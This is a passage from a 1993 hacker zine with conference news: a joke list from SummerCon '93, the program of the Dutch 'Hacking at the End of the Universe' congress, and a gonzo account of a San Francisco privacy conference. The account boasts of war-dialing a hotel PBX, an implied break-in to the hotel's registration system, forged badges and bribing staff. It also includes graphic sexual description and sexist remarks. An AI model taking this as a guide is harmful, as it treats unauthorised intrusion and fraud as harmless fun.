O.I.S., include your phone number and mail it to the street address listed above. Allow a few weeks for arrival. Thanks to everyone who attended and supported HoHoCon '92. Mail us if you wish to be an early addition to the HoHoCon '93 (December 17-19) mailing list. Calvary Black Crawling Systems 617-267-2732 617-482-6356 ATDT EAST 617-350-STIF DemOnseed sez: "Call ATDT East or I'll crush your skull" Home of -= RDT... Trailings to follow . . . Slug, slug, slugfest . . . Join the ranks of the Cons: HoHoCon, MardiCon, SummerCon !!! **************************************************************************** Top 25 Things I Learned at SummerCon '93 -------------------------------- By Darkangel SummerCon is a place where many hackers from all over the world meet to discuss the current state of hacking today, and to drink themselves under the table. Every year, pages and pages of useful information is passed and traded among the participants. In this brief summery, I will attempt to point out the things that I learned and I thought were the most helpful to the whole hacker community. I hope you enjoy it. #1) DON'T let Control-C within 15 feet of any person that does not have a penis. #2) Knight Lightning will have a stroke before the age of 30. #3) French Canadians ALWAYS sound drunk. #4) Loops do not make good pickup lines. #5) The Zenith is outside the window. Just look up. #6) Smoking certain herbs is still illegal in St. Louis. #7) If you see a taxi and think it might be a cop, it probably is. #8) Hotel Security is worse than Mall Security. #9) The payphones in the lobby are not meant to be free. #10) Do not climb through the ceiling to get to the room with the PBX in it. #11) Do not glue the locks shut on an entire floor of the hotel. (especially when people are in them) #12) This machine is broken. #13) Do not dump bags you got trashing on the floor of someone else's room. #14) St. Louis police do not appreciate the finer points of Simplex lock hacking. #15) VaxBuster should never be allowed to drink Everclear. #16) Scribbles has a very nice ass. #17) Do not photograph Pakistani hotel security guards. #18) Do not try to bring a six pack through customs. #19) Loki is the Fakemail God. #20) Do not rip the phone boxes out of the walls and cut the wires. #21) Barbie Doll pornos can be cool. #22) Frosty can do weird things with techno and movies. #23) Always remove the mirrors from the walls to check for hidden cameras. #24) Do not threaten or harass other people staying at the same hotel. This can be bad. #25) I really don't think the hotel will let us come back. That wraps it up! See you at HoHoCon! -Darkangel *************************************************************************** Hack-Tic Presents H A C K I N G at the E N D of the U N I V E R S E 1993 SUMMER CONGRESS, THE NETHERLANDS ========================================================================= HEU? Remember the Galactic Hacker Party back in 1989? Ever wondered what happened to the people behind it? We sold out to big business, you think. Think again, we're back! That's right. On august 4th, 5th and 6th 1993, we're organizing a three-day summer congress for hackers, phone phreaks, programmers, computer haters, data travellers, electro-wizards, networkers, hardware freaks, techno-anarchists, communications junkies, cyberpunks, system managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez dudes, law enforcement officers (appropriate undercover dress required), guerilla heating engineers and other assorted bald, long-haired and/or unshaven scum. And all this in the middle of nowhere (well, the middle of Holland, actually, but that's the same thing) at the Larserbos campground four meters below sea level. The three days will be filled with lectures, discussions and workshops on hacking, phreaking, people's networks, Unix security risks, virtual reality, semafun, social engineering, magstrips, lockpicking, viruses, paranoia, legal sanctions against hacking in Holland and elsewhere and much, much more. English will be the lingua franca for this event, although one or two workshops may take place in Dutch. There will be an Internet connection, an intertent ethernet and social interaction (both electronic and live). Included in the price are four nights in your own tent. Also included are inspiration, transpiration, a shortage of showers (but a lake to swim in), good weather (guaranteed by god), campfires and plenty of wide open space and fresh air. All of this for only 100 dutch guilders (currently around US$70). We will also arrange for the availability of food, drink and smokes of assorted types, but this is not included in the price. Our bar will be open 24 hours a day, as well as a guarded depository for valuables (like laptops, cameras etc.). You may even get your stuff back! For people with no tent or air mattress: you can buy a tent through us for 100 guilders, a mattress costs 10 guilders. You can arrive from 17:00 (that's five p.m. for analogue types) on August 3rd. We don't have to vacate the premises until 12:00 noon on Saturday, August 7 so you can even try to sleep through the devastating Party at the End of Time (PET) on the closing night (live music provided). We will arrange for shuttle buses to and from train stations in the vicinity. HOW? Payment: in advance please. Un-organized, poor techno-freaks like us would like to get to the Bahamas at least once. We can only guarantee you a place if you pay before Friday June 25th, 1993. If you live in Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention 'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic, Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere: call, fax or e-mail us for the best way to get the money to us from your country. We accept American Express, we do NOT cash ANY foreign cheques. HA! Very Important: Bring many guitars and laptops. ME? Yes, you! Busloads of alternative techno-freaks from all over the planet will descend on this event. You wouldn't want to miss that, now, would you? Maybe you are part of that select group that has something special to offer! Participating in 'Hacking at the End of the Universe' is exciting, but organizing your very own part of it is even more fun. We already have a load of interesting workshops and lectures scheduled, but we're always on the lookout for more. We're also still in the market for people who want to help us organize during the congress. In whatever way you wish to participate, call, write, e-mail or fax us soon, and make sure your money gets here on time. Space is limited. SO: - 4th, 5th and 6th of August - Hacking at the End of the Universe (a hacker summer congress) - ANWB groepsterrein Larserbos Zeebiesweg 47 8219 PT Lelystad The Netherlands - Cost: fl. 100,- (+/- 70 US$) per person (including 4 nights in your own tent) MORE INFO: Hack-Tic Postbus 22953 1100 DL Amsterdam The Netherlands tel : +31 20 6001480 fax : +31 20 6900968 E-mail : heu@hacktic.nl VIRUS: If you know a forum or network that you feel this message belongs on, by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC, WP.BAT, you name it. Spread the worm, uh, word. ========================================================================= SCHEDULE day 0 August 3rd, 1993 ===== 16:00 You are welcome to set up your tent 19:00 Improvised Dinner day 1 August 4th, 1993 ===== 11:00-12:00 Opening ceremony 12:00-13:30 Workshops 14:00-15:30 Workshops 15:30-19:00 'Networking for the Masses' 16:00-18:00 Workshops 19:00-21:00 Dinner 21:30-23:00 Workshops day 2 August 5th, 1993 ===== 11:30-13:00 Workshops 14:00-17:00 Phreaking the Phone 14:00-17:00 Workshops 17:30-19:00 Workshops 19:00-21:00 Dinner day 3 August 6th, 1993 ===== 11:30-13:00 Workshops 14:00-18:00 Hacking (and) The Law 14:00-17:00 Workshops 18:00-19:00 Closing ceremony 19:00-21:00 Barbeque 21:00-??:?? Party at the End of Time (Live Music) day 4 August 7th, 1993 ===== 12:00 All good things come to an end ========================================================================= 'Networking for the masses', Wednesday August 4th 1993, 15:30 One of the main discussions at the 1989 Galactic Hacker Party focused on whether or not the alternative community should use computer networking. Many people felt a resentment against using a 'tool of oppression' for their own purposes. Computer technology was, in the eyes of many, something to be smashed rather than used. Times have changed. Many who were violently opposed to using computers in 1989 have since discovered word-processing and desktop publishing. Even the most radical groups have replaced typewriters with PCs. The 'computer networking revolution' has begun to affect the alternative community. Not all is well: many obstacles stand in the way of the 'free flow of information.' Groups with access to information pay such high prices for it that they are forced to sell information they'd prefer to pass on for free. Some low-cost alternative networks have completely lost their democratic structure. Is this the era of the digital dictator, or are we moving towards digital democracy? To discuss these and other issues, we've invited the following people who are active in the field of computer networking: [Electronic mail addresses for each of the participants are shown in brackets.] Ted Lindgreen (ted@nluug.nl) is managing director of nlnet. Nlnet is the largest commercial TCP/IP and UUCP network provider in the Netherlands. Peter van der Pouw Kraan (peter@hacktic.nl) was actively involved in the squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas about technology and its relation to society. Had a PC all the way back in 1985! Maja van der Velden (maja@agenda.hacktic.nl) is from the Agenda Foundation which sets up and supports communication and information projects. Joost Flint (joost@aps.hacktic.nl) is from the Activist Press Service. APS has a bbs and works to get alternative-media and pressure groups online. Felipe Rodriquez (nonsenso@utopia.hacktic.nl) is from the Hack-Tic Network which grew out of the Dutch computer underground and currently connects thousands of people to the global Internet. Andre Blum (zabkar@roana.hacktic.nl), is an expert in the field of wireless communications. Eelco de Graaff (Eelco.de.Graaff@p5.f1.n281.z2.fidonet.org) is the nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the founders of the Dutch Fidonet Foundation. Michael Polman (michael@antenna.nl) of the Antenna foundation is a consultant in the field of international networking. He specialises in non-governmental networks in the South. Alfred Heitink (alfred@antenna.nl) is a social scientist specializing in the field of computer-mediated communication as well as system manager at the Dutch Antenna host. Rena Tangens (rena@bionic.zer.de), was involved in the creation of the Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network. She is an artist and wants to combine art and technology. The discussion will be led by freelance radiomaker and science journalist Herbert Blankesteyn. He was involved in the 'Archie' children's bbs of the Dutch VPRO broadcasting corporation. ========================================================================= 'Phreaking the Phone', Thursday August 5th 1993, 14:00 Your own telephone may have possibilities you never dreamed possible. Many years ago people discovered that one could fool the telephone network into thinking you were part of the network and not just a customer. As a result, one could make strange and sometimes free phonecalls to anywhere on the planet. A subculture quickly formed. The phone companies got wise and made a lot of things (nearly) impossible. What is still possible today? What is still legal today? What can they do about it? What are they doing about it? Billsf (bill@tech.hacktic.nl) and M. Tillman, a few of the worlds best phreaks, will introduce the audience to this new world. Phone phreaks from many different countries will exchange stories of success and defeat. Your life may never be the same. ========================================================================= 'Hacking (and) The Law', Friday August 6th, 14:00 You can use your own computer and modem to access some big computer system at a university without the people owning that computer knowing about it. For years this activity was more or less legal in Holland: if you were just looking around on the Internet and didn't break anything nobody really cared too much... That is, until shortly before the new computer crime law went into effect. Suddenly computer hackers were portrayed as evil 'crashers' intent on destroying systems or, at least, looking into everyone's files. The supporters of the new law said that it was about time something was done about it. Critics of the law say it's like hunting mosquitoes with a machine-gun. They claim the aforementioned type of hacking is not the real problem and that the law is excessively harsh. To discuss these issues we've invited a panel of experts, some of whom are, or have been, in touch with the law in one way or another. Harry Onderwater (fridge@cri.hacktic.nl), is technical EDP auditor at the Dutch National Criminal Intelligence Service (CRI) and is responsible for combatting computer crime in the Netherlands. He says he's willing to arrest hackers if that is what it takes to make computer systems secure. Prof. Dr. I.S. (Bob) Herschberg (herschbe@dutiws.twi.tudelft.nl), gained a hacker's control over his first system 21 years ago and never ceased the good work. Now lecturing, teaching and publishing on computer insecurity and imprivacy at the technical university in Delft. His thesis: 'penetrating a system is not perpetrating a crime'. Ronald 'RGB' O. (rgb@utopia.hacktic.nl) has the distinction of being the only Dutch hacker arrested before and after the new law went into effect. He is a self-taught UNIX security expert and a writer for Hack-Tic Magazine. Ruud Wiggers (ruudw@cs.vu.nl), system manager at the Free University (VU) in Amsterdam, has for 10 years been trying to plug holes in system security. He was involved in the RGB arrest. Andy Mueller-Maguhn (andy@cccbln.ccc.de) is from the Chaos Computer Club in Germany. Eric Corley (emmanuel@eff.org) a.k.a. Emmanuel Goldstein is editor of the hacker publication '2600 magazine'. The first person to realize the huge implications of the government crackdown on hackers in the US. Winn Schwartau (wschwartau@mcimail.com) is a commercial computer security advisor as well as the author of the book 'Terminal Compromise'. His new book entitled 'Information Warfare' has just been released. Ray Kaplan (kaplan@bpa.arizona.edu) is a computer security consultant. He is constantly trying to bridge the gap between hackers and the computer industry. He organizes 'meet the enemy' sessions where system managers can teleconference with hackers. Wietse Venema (wietse@wzv.win.tue.nl) is a systems expert at the Technical University in Eindhoven. He is the author of some very well known utilities to monitor hacking on unix systems. He has a healthy suspicion of anything technical. Peter Klerks (klerks@rulfsw.leidenuniv.nl) is a scientist at the centre for the study of social antagonism at the Leiden University. He has studied the Dutch police force extensively, and is author of the book 'Counterterrorism in the Netherlands.' Don Stikvoort (stikvoort@surfnet.nl), one of the computer security experts for the Dutch Academic Society and chairman of CERT-NL (Computer Emergency Response Team). He is also actively involved in SURFnet network management. Rop Gonggrijp (rop@hacktic.nl) was involved in some of the first computer break-ins in the Netherlands during the 80's and is now editor of Hack-Tic Magazine. The discussion will be led by Francisco van Jole (fvjole@hacktic.nl), journalist for 'De Volkskrant'. ========================================================================= WORKSHOPS HEUnet introduction an introduction to the Hacking at the End of the Universe network. Jumpstart to VR, 3D world-building on PC's Marc Bennett, editor of Black Ice magazine, will explain how to design worlds on your own PC which can be used in Virtual Reality systems. Replacing MS/DOS, Running UNIX on your own PC People who are already running unix on their PCs will tell you what unix has to offer and they'll talk about the different flavours in cheap or free unix software available. Unix security RGB and fidelio have probably created more jobs in the unix security business than the rest of the world put together. They'll talk about some of the ins and outs of unix security. E-mail networking Should we destroy X400 or shall we let it destroy itself? 'User Authorization Failure' A quick introduction to the VAX/VMS Operating System for those that consider a career in VMS security. 'The right to keep a secret' Encryption offers you the chance to really keep a secret, and governments know it. They want you to use locks that they have the key to. The fight is on! 'Virus about to destroy the earth!'. Don't believe the hype! What is the real threat of computer viruses? What technical possibilities are there? Are we being tricked by a fear-machine that runs on the money spent on anti-virus software? 'It came out of the sky' 'Receiving pager information and what not to do with it'. Information to pagers is sent through the air without encryption. Rop Gonggrijp and Bill Squire demonstrate a receiver that picks it all up and present some spooky scenarios describing what one could do with all that information. Cellular phones and cordless phones How do these systems work, what frequencies do they use, and what are the differences between different systems world-wide? Zen and the art of lock-picking. In this workshop The Key will let you play with cylinder locks of all types and tell you of ingenious ways to open them. "Doesn't mean they're not after you" The secret services and other paranoia. Audio Adventures Steffen Wernery and Tim Pritlove talk about adventure games that you play using a Touch Tone telephone. Botanical Hacking (THC++) Using computers, modems and other high tech to grow. Wireless LAN (Data Radio) How high a data rate can you pump through the air, and what is still legal? Social Engineering The Dude, well known from his articles in Hack-Tic, will teach you the basics of social engineering, the skill of manipulating people within bureaucracies. 'Hacking Plastic' Tim and Billsf talk about the security risks in chip-cards, magnetic cards, credit cards and the like. Antenna Host Demo The Antenna Foundation is setting up and supporting computer networks, mainly in the South. They are operating a host system in Nijmegen, The Netherlands, and they will demonstrate it in this workshop, and talk about their activities. APS Demo APS (Activist Press Service) is operating a bbs in Amsterdam, The Netherlands. You'll see it and will be able to play with it 'hands-on'. 'Hocking the arts' Benten and Marc Marc are computer artists. They present some of their work under the motto: Hocking the arts, demystifying without losing its magic contents. Public Unix Demo Demonstrating the Hack-Tic xs4all public unix, as well as other public unix systems. Packet Radio Demo Showing the possibilities of existing radio amateur packet radio equipment to transport packets of data over the airwaves. ========================================================================= COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE' This will get a little technical for those who want to know what we're going to set up. If you don't know much about computers, just bring whatever you have and we'll see how and if we can hook it up. We're going to have ethernet connected to Internet (TCP/IP). You can connect by sitting down at one of our PC's or terminals, by hooking up your own equipment (we have a depository, so don't worry about theft), or by using one of our 'printerport <--> ethernet' adapters and hooking up laptops and notebooks that way. There may be a small fee involved here, we don't know what they're going to cost us. Contact us for details, also if you have a few of these adapters lying around. There might also be serial ports you can connect to using a nullmodem cable. You can log in to our UNIX system(s) and send and receive mail and UseNet news that way. Every participant that wants one can get her/his own IP number to use worldwide. Users of the network are urged to make whatever files they have on their systems available to others over the ethernet. Bring anything that has a power cord or batteries and let's network it! ========================================================================= -- Hstorm ++31 2230 60551 Ad Timmering  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 8 of 27 CONFERENCE NEWS PART II **************************************************************************** Fear & Loathing in San Francisco By Some Guy (The names have been changed to protect the guilty.) 1. The Arrival I had been up for about 48 hours by the time America West dropped me off at San Francisco's airport. The only thing I could think about was sleep. Everything took on strange dreamlike properties as I staggered through the airport looking for the baggage claim area. Somehow, I found myself on an airport shuttle headed towards the Burlingame Marriott. Suddenly I was standing in front of an Iranian in a red suit asking me for a major credit card. After a quick shuffle of forms at the checkin counter I finally had the cardkey to my room and was staggering toward a nice warm bed. Once in the room I fell down on the bed, exhausted. Within the space of a few minutes I was well on my way to Dreamland. Within the space of a few more minutes I was slammed back into reality as someone came barreling into the room. Mr. Blast had arrived from Chitown with a bag full of corporate goodies. I accepted a shirt and told him to get lost. No sooner had he left than Fitzgerald burst in with enough manuals to stock a small college's technical library. After griping for nearly 30 minutes at the fact that I had neglected to likewise bring 500 pounds of 5ess manuals for him, Fitzgerald took off. Sleep. 2. Mindvodxka After several needed hours rest, I took off downstairs to scope out the spread. I ran into Bruce Sterling who relayed some of the mornings events, the highlight of which was Don Delaney's "Finger Hackers" the inner city folks who sequentially dial, by hand, every possible combination of pbx code to then sell on street corners. Out of the corner of my eye I spotted two young turks dressed like mafioso: RBOC & Voxman. I wandered over and complimented them on their wardrobe and told them to buy me drinks. Beer. Beer. More beer. Screwdrivers. Screwdrivers. Last call. Last screwdriver. RBOC and I decided that it was our calling to get more drinks. We took off to find a bar. Upon exiting the hotel we realized that we were in the middle of fucking nowhere. We walked up and down the street, rapidly getting nowhere. In our quest for booze, we managed to terrorize a small oriental woman at a neighboring hotel who, after 10 minutes of our screaming and pounding, finally opened up the door to her office wide enough to tell us there were no bars within a 15 mile radius. We went back to the hotel very distraught. We went back to RBOC's room where Voxman was sampling a non-tobacco smoke. We bitched about the lack of watering holes in the vicinity, but he was rather unsympathetic. After he finished his smoke and left the room, we decided to order a bottle of vodka through room service and charge it to Voxman since it was roughly 50 dollars. RBOC called up room service and started to barter with the clerk about the bottle. "Look, tell you what," he said, "I've got twenty bucks. You meet me out back with two bottles. I give you the twenty and you keep one of the bottles for yourself." "Look man, I know you have about a thousand cases of liquor down there, right? Who's going to miss two bottles? Don't you want to make a few extra bucks? I mean, twenty dollars, that's got to be about what you make in a day, right? I mean, you aren't exactly going to own this hotel any time soon, am I right? So, I'll be down in a few minutes to meet you with the vodka. What do you mean? Look man, I'm just trying to help out another human being. I know how it is, I'm not made out of money either, you know? Listen, I'm from NYC...if someone offers me twenty dollars for nothing, I take it, you know? So, do we have a deal?" This went on for nearly an hour. Finally RBOC told the guy to just bring up the damn bottle. When it arrived, the food services manager, acting as courier, demanded proof of age, and then refused to credit it to the room. This sparked a new battle, as we then had to track down Voxman to sign for our booze. After that was settled, a new crisis arose: We had no mixer. The soda machine proved our saviour. Orange Slice for only a dollar a can. We decided to mix drinks half and half. Gathering our fluids, we adjourned to the lobby to join Voxman and a few conventioneers. The vodka went over well with the crew, and many a glass was quaffed over inane conversation about something or other. Soon the vodka informed me it was bed time. 3. It Begins. I woke late, feeling like a used condom. I noticed more bags in the room and deduced that X-con had made it to the hotel. After dressing, I staggered down to the convention area for a panel. "Censorship and Free Speech on the Networks" was the first one I got to see. The main focus of the panel seemed to be complaints of alt.sex newsgroups and dirty gifs. As these two are among my favorite things about the net, I took a quick disliking of the forum. Nothing was resolved and nothing was stated. There was a small break during which I found X-con. We saw a few feds. It was neat. The head of the FBI's computer crime division called me by name. That was not terribly neat. The next session was called "Portrait of the Artist on the Net." X-con and I didn't get it. We felt like it was "portrait of the artist on drugs on the net." Weird videos, odd projects, and stream of consciousness rants. Wasn't this a privacy conference? We were confused. The session gave way to a reception. This would have been uneventful had it not been for two things: 1) an open bar 2) the arrival of the Unknown Hacker. U.H. was probably the most mysterious and heralded hacker on the net. The fact that he showed up in public was monumental. The reception gave way to dinner, which was uneventful. 4. Let the Beatings Begin A few days before the con, Mr. Blast had scoured the net looking for dens of inequity at my behest. In alt.sex.bondage he had run across a message referring to "Bondage A Go-Go." This was a weekly event at a club in the industrial district called "The Bridge." The description on the net described it as a dance club where people liked to dress up in leather and spikes, and women handcuffed to the bar from 9-11 drank free! This was my kind of place. On that Wednesday night, I could think of nothing but going out and getting to Bondage A Go-Go. I pestered X-con, Mr. Blast and U.H. into going. We tried to get Fender to go too, but he totally lamed out. (This would be remembered as the biggest mistake of his life.) We eventually found ourselves driving around a very seedy part of San Francisco. On one exceedingly dark avenue we noticed a row of Harleys and their burly owners hanging outside a major dive. We had found our destination. Cover was five bucks. Once inside we were assaulted by pounding industrial and women in leather. RAD! Beer was a buck fifty. Grabbing a Coors and sparking a Camel, I wandered out to the main dance floor where some kind of event was taking place. Upon a raised stage several girlies were undulating in their dominatrix get-ups, slowly removing them piece by piece. A smile began to form. X-con and U.H. found me and likewise denoted their approval. The strip revue continued for a few songs, with the girlies removing everything but their attitudes. The lights went up, and a new girl came out. She was followed by a friend carrying several items. The first girl began to read rather obscure poetry as the second undressed her. Once girl1 was free of restrictive undergarments girl2 donned surgical gloves and began pouring generous amounts of lubricant over her hands. As the poetry reached a frantic peak, girl2 slowly inserted her entire hand into girl1. A woman in the crowd screamed. My smile was so wide, it hurt. The fisting continued for an eternity, with girl1 moving around the stage complaining in her poetic rant about how no man could ever satisfy her. (This was of no surprise to me since she had an entire forearm up her twat.) Girl2 scampered around underneath, happily pumping away for what seemed like an hour. When the performance ended, a very tall woman in hard dominatrix gear sauntered out on the stage. From her Nazi SS cap to her stiletto heels to her riding crop, she was the top of my dreams. Two accomplices tied a seemingly unwilling bottom to the stage and she began striking her repeatedly with the crop, to the beat of something that sounded like KMFDM. The screams filled the club, and drool filled the corners of my mouth. As the song ended, the girls all came back out on stage and took a bow to deafening applause. Then the disco ball lit up, and Ministry began thundering, and people began to dance like nothing had ever happened. We were a bit stunned. We all wandered up to the second level where we were greeted by a guy and two girls going at it full on. I staggered dazed to the second story on the opposite side. There was a skinhead getting a huge tattoo and a girl getting a smaller one. I was not brave enough to risk the needle in San Francisco, so I wandered back downstairs. That's where I fell in love. She was about 5'2", clad in a leather teddy, bobbed blood red hair, carrying a cat o'nine tails. Huge, uh, eyes. Alas, 'twas not to be. She was leading around a couple of boy toys on studded leashes. Although the guys seemed to be more interested in each other than her, I kept away, knowing I would get the hell beaten out of me if I intervened. As it approached 3:00 am, we decided it was time to go. We bid a fond farewell to the Bridge and took leave. We all wanted to see Golden Gate, so U.H. directed us towards downtown to the bridge. Passing down Market, we noticed a man lying in a pool of blood before a shattered plate glass window, surrounded by cops. We eventually reached the Golden Gate Bridge. We drove across to the scenic overlook. Even in the darkness it was rather cool. We took off through the hills and nearly smashed into a few deer with the car. It was almost time for the conference by then, so we decided to get back. 5. Thursday I made it downstairs for the "Medical Information and Privacy" that morning. As I was walking towards the room, I got a sudden flash of an airlines advertisement. The Pilot had arrived. I was shocked. Here was this guy who used to be one of the evil legionnaires, and he looked like an actor from a delta commercial...blue suit, aviator sunglasses, nappy hat with the little wings. Appalling. I drug him into the meeting hall where we sat and made MST3K-like commentary during the panel. I began to get mad that no one had even mentioned the lack of legislation regarding medical records privacy, nor the human genome project. I was formulating my rude commentary for the question period when the last speaker thankfully brought up all these points, and chastised everyone else for not having done so previously. Good job. I snaked The Pilot a lunch pass, and we grabbed a bite. It was pretty good. I noticed that it was paid for by Equifax or Mead Data Central or some other data-gathering puppet agency of The Man. No doubt a pathetic ploy to sway our feelings. I ate it anyway. After lunch, John Perry Barlow got up to bs a bit. The thing that stuck me about Barlow was his rant about the legalization of drugs. Yet another stray from computers & privacy. It must be nice to be rich enough to stand in front of the FBI and say that you like to take acid and think it ought to be legal. I debated whether or not to ask him if he knew where to score any in San Francisco, but decided on silence, since I'm not rich. I lost all concept of time and space after Barlow's talk, and have no idea what happened between that time and that evening. 6. Birds of a Feather BOF together That night we went to the Hacker BOF, sponsored by John McMullen. Lots of oldies siting around being superior since it wasn't illegal when they swiped cpu access, and lots of newbies sitting around feeling superior since they had access to far better things than the oldies ever dreamed of. A certain New York State Policeman had been given the remainder of the bottle of vodka from the previous night. It was gone in record time. Later he was heard remarking about how hackers should get the death penalty. When Emmanuel Goldstein demonstrated his Demon Dialer from the Netherlands, he sat in the corner slamming his fist into his hand muttering, "wait till we get home, you'll get yours." I went outside and hid. Also hiding outside was Phiber. We exchanged a few glares. He and I had been exchanging glares since our respective arrivals. But neither of us said anything directly to the other. I had heard from several people that Phiber had remarked, "on the third day, I'm gonna get that guy. Just you wait." I was waiting. I decided that Thursday should be the night we would all go to a strip club. After telling everyone within a 15 mile radius about Bondage A Go-Go, it was rather easy to work up an interest in this adventure. Me, X-con, Mr. Blast, U.H. and Fender would be the valiant warriors. Before making preparations to leave, X-con and Fitzgerald decided to check out the hotel's PBX. Setting up Tone-Loc, X-con's notebook set out banging away at the available block of internals. We decided that the hotel had a 75, and yes, it would be ours, oh yes, it would be ours. It was a Herculean task to gather the crew. Despite their desire to go, everyone farted around and rounding them up was akin to a cattle drive. Fender cried about having to attend this BOF and that BOF and Mr. Blast cried about being tired, Fitzgerald cried about not being old enough to go, and I just cried. Eventually we gathered our crew and launched. 8. Market Street Madness We initially went out to locate the Mitchell Brothers club. I had heard that it was quite rad. Totally nude. Lap dancing. Total degradation and objectification. Wowzers. U.H. said he knew where it was. He was mistaken. The address in the phone book was wrong. It was nowhere to be found. We ended back up on Market surrounded by junkies and would-be muggers. Thankfully, there were no fresh corpses. I saw a marquee with the banner Traci Topps. Forcing Mr. Blast to pull over, we made a beeline to the entrance. Cover was ten dollars, and we had missed Traci's last performance. We paid it anyway, since we had bothered to pull over. Big mistake. Now, when I think of strip clubs, I think of places like Houston's Men's Club, or Atlanta's Gold Club, or Dallas' Fantasy Ranch. Very nice. Hot women. Good music. Booze. Tables. We entered a room that used to be a theater. Sloping aisles along theater seats side by side. Up on the stage, was a tired, unattractive, heavy set brunette slumping along to some cheesy pop number. I was instantly disgusted. I felt compelled to tell X-con that strip clubs were not like this normally, since he had never been to one, and it was my bright idea to be here. We noticed some old perv at the far end of our row in a trench. It was like out of a bad movie. He was not at all shy about his self-satisfaction and in fact seemed quite proud of it. He kept trying to get the girls to bend down so he could fondle them. Gross beyond belief. We debated whether or not to point and laugh at him, but decided he might have something more deadly concealed under the trench and tried to ignore it. Some more furniture passed across the stage. One sauntered over to me and asked if I'd like any company. I asked her what the hell this place was all about. She said that this was the way most places were downtown. I told her that I expected tables, beer, and a happy upbeat tempo. She shrugged and said she didn't know of anything really like that. On the stage a really cute girl popped up. A shroom on this turd of a club. Fender and I both decided she was ours. Fender said there was no way that I would get the only good looking girl in the place. I said he needed to get real, that it would be no contest. As soon as she left the stage, Fender disappeared. Later he returned smirking. Moments afterward, the girl appeared and plopped down in his lap. (We found out later he paid her.) He continued his dialogue for about 20 minutes discussing philosophy or something equally stupid to talk to a nude dancer about, and then we got up to leave. She gave him her phone number. (It was the number to the Special Olympics.) We left, and I apologized to everyone. We took off to Lombard street and fantasized about letting the rental car loose to plummet down the hill, destroying everything in its path. Next time we decided we would. Then it was decided that it would be a good idea to look for some food. We ended up somewhere where there was some kind of dance club. Everything was closed and there was no food to be seen. Walking down a few side streets looking for food, U.H. decided to tell Fender that he had broken into his machine. Fender turned about 20 shades of green. We then went back to the Golden Gate Bridge since it never closed and stared out at the bay. Fender began to talk incoherently so it became urgent that we get back to the hotel and put him to bed to dream happy dreams of his stripper Edie. Back at the hotel X-con and I could not sleep. The notebook had found a number of carriers. One was for a System V unix. We decided that this was the hotel's registration computer. We knew most used some kind of package like encore, so we...well. :) We also found several odd systems, probably some kind of elevator/ac/power controllers or whatnot. At 5am or so, X-con and I took off to explore the hotel. Down in the lobby we found RBOC busily typing away to a TTD operator on the AT&T payphone 2000. He was engrossed in conversation, so we left him to his typing. X-con started to look around the Hertz counter for anything exciting and set off the alarm. Within seconds security arrived to find me perched on the shoeshine stand and X-con rapping on the payphone to another hotel. We told him we hadn't seen anyone go behind the counter. He didn't believe us but left anyway. As we burst into fits of laughter, Mitch Kapor, in shorts and t-shirt came cruising by and exited through a glass door. We weren't quite sure if he were real so we snuck through the door after him. The door led to the gym. Mitch was busily pedaling away on an exercycle. X-con and I decided to explore the hotel since we never even knew there was a gym, and who could tell what other wild and wacky places remained unseen. We took off to find the roof, since that was the most obvious place to go that we should not be. Finding the stairwell with roof access, we charged up to the top landing. The roof was unlocked, but right before opening the hatch, we noticed that there was a small magnetic contact connected to a lead. Not feeling up to disabling alarm systems so late in the evening (or early in the morning), we took off. On another level, we found the offices. Simplex locks. Amazing. Evil grins began to form, but we wimped out, besides it was damn near convention time. 9. Coffee, Coffee and More Coffee Outside the convention room the caterers had set up the coffee urns. X-con and I dove into the java like Mexican cliff jumpers. It got to be really really stupid. We were slamming coffee like there was no tomorrow. Fuck tomorrow, we slammed it like there was no today. I put about eight packets of sugar in each of my cups. Ahh, nothing like a steamin' cup o' joe. By the time we were done we had each drank nearly 20 cups. The world was alive with an electric hum. We were ready to take on the entire convention. Yep. After another cup. The first panel of the day was "Gender Issues in Computing and Telecommunications." As the talk began, the pig in me grew restless. "What's all this crap?" it said. "Bunch of feminazis bitching about gifs. They should all go to the bridge next Wednesday, that will give them a new perspective. Where's Shit Kickin' Jim when you need him?" Then I got more idealistic in my thinking. "Ok, fine, if women demand equal treatment on the net, then what about equal treatment for homosexuals? What about equal treatment for hermaphrodites? What about equal treatment for one-legged retired American Indian Proctologists on the net? And let us not forget the plight of the Hairless. Geez. What a load of hooey. I wanted to jump up and yell, "THE NET IS NOT REAL! WORRY ABOUT THE REAL WORLD AND THE NET WILL CHANGE! YOU CANNOT CHANGE REALITY BY CHANGING THE NET!" If only I'd had another cup of coffee, I might have done it. The women got nothing done. After the panel X-con and I took off to the room, after getting a few cups of coffee for the elevator ride. We sat in the hotel room and made rude noises until Mr. Blast and Fitzgerald got up. We all fought for the shower and by noon we were ready to venture outward for lunch. 10. Cliffie! The lunch that day had a few pleasant surprises. The first came in the form of a waitress with HUGE, uh, eyes. Having something of an fetish for big, ahem, eyes, I practiced my patented Manson-like gaze for her benefit. The second surprise came when a the CFP staffers cornered a couple of people at our table. KCrow and Xaen had photocopied lunch tickets and forged badges to hang out at the conference. Finally, on the last day, the staffers suddenly decided that these two might not be paying attendees. Whether it was the names on their badges that did not check out, or the fact that Xaen had been walking around in a red and white dress-like robe the entire day. They let them stay, but told them next time to either make better forgeries or send in their scholarship applications like everyone else. As lunch drew to a close, the crowd grew restless. A cry rang out, "CLIFFIE!" The crowd took up the cry, and executives began throwing conference papers in the air, stomping their feet and holding up their lit cigarette lighters. "We want Cliffie, we want Cliffie!" The house lights dimmed and a silhouette of frazzled hair appeared at the head of the room. Well, maybe it wasn't quite like that. Cliff Stoll took the stand and began a stream of consciousness rant that would make someone with a bipolar disorder look lucid. Contorting himself and leaping on tables, Cliff definitely got my attention. It was kind of like watching Emo Philips on crank while tripping. I dug it. If you have the opportunity to catch Cliff on his next tour, make sure to do so. Lorne Michaels could do worse than make some kind of sitcom around this guy. It was probably the most amazing thing I had seen at the official conference. 11. A Little Bit O' History Fitzgerald heard that there was a Pac Bell museum downtown. This news evoked a Pavlovian response almost as pronounced as me at The Bridge. Me and The Pilot wanted to check it out too so we decided 